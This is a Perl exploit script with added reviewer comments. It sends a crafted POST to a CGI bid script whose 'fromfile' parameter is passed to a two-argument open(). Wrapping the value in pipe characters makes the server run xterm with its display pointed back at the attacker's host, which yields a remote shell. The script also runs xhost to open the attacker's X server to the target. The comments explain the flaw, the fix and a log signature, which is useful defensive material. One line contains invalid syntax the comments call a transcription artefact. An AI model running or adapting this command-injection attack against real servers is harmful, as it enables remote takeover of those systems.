#!/usr/bin/perl
## This exploit will spawn a xterm from $target to $attacker.
#
# Reviewer notes (defensive reading of this script):
#   * The request body below feeds a CGI script whose "fromfile" parameter is
#     evidently handed to a Perl two-argument open(): a value wrapped in pipe
#     characters (%7C ... %7C) makes open() treat it as a command rather than
#     a filename.  Server-side remedy is three-argument open() plus an anchored
#     allow-list on the filename; on the detection side, "%7C" or "|" inside
#     form parameters in the web server's access log is the signature of this
#     class of request.
#   * Formatting was reconstructed from a single collapsed line.  Statement
#     boundaries are certain; the line breaks inside the request literal are
#     inferred from HTTP framing and should be confirmed against the original.
use strict;
use warnings;
use Socket;

# The usage text lost its argument names in transcription; the three
# positional arguments are (from the assignment below) target host,
# attacker host and X display number.
if (@ARGV < 3) {
    print("Usage: $0 \n");
    exit(1);
}

my($target, $attacker, $dpy, $length, $cgicode, $agent, $sploit, $iaddr, $paddr, $proto);
($target, $attacker, $dpy) = @ARGV;

# Note: the pattern is unanchored, so this only checks that $dpy contains at
# least one digit, not that it is entirely numeric.
if ($dpy !~ /\d/) {
    print("dpy must be a number, probably 0\n");
    exit(1);
}

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/sub_dir/the_victim_script.pl\n");
print("Command: xterm -ut -display $attacker:$dpy\n\n");

# Opens the local X server's access control to $target for the duration of
# the run (reverted after the sleep below).  $target comes straight from
# @ARGV and is passed through the shell; list-form system('xhost', "+$target")
# would avoid shell parsing of that value.
system("xhost + $target");

# 138 is presumably the byte count of the fixed portion of $cgicode, with the
# two interpolated values added on top -- TODO confirm against the literal.
$length = 138 + length($attacker.$dpy);

# URL-encoded form body.  The pipe characters (%7C) around the command are
# what turns the "fromfile" value into a command for a two-argument open().
$cgicode = "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
"=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut".
"ton=BID";
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# The path to the_victim_script.pl may of course need to be changed.
# Raw HTTP/1.0 POST; header lines are separated by whatever newline the
# literal carried in the original (reconstructed here as plain newlines).
$sploit= "POST /cgi-bin/sub_dir/the_victim_script.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: $length

$cgicode";

$iaddr = inet_aton($target) or die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) or die("Error: $!\n");
# NOTE(review): "or|" is not valid Perl -- as written, this script does not
# compile.  Kept byte-identical here; it looks like a transcription artefact.
$proto = getprotobyname('tcp') or| die("Error: $!\n");

# Bareword filehandle SOCKET (a lexical handle would be the modern form);
# close() is unchecked.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die("Error: $!\n");
connect(SOCKET, $paddr) or die("Error: $!\n");
# A trailing CRLF is appended to terminate the request.
send(SOCKET,"$sploit\015\012", 0) or die("Error: $!\n");
close(SOCKET);

sleep(3);
# Revoke the X access granted above.
system("xhost - $target");
print("\nAll done - hopefully you got the flying xterm!\n");
exit(0)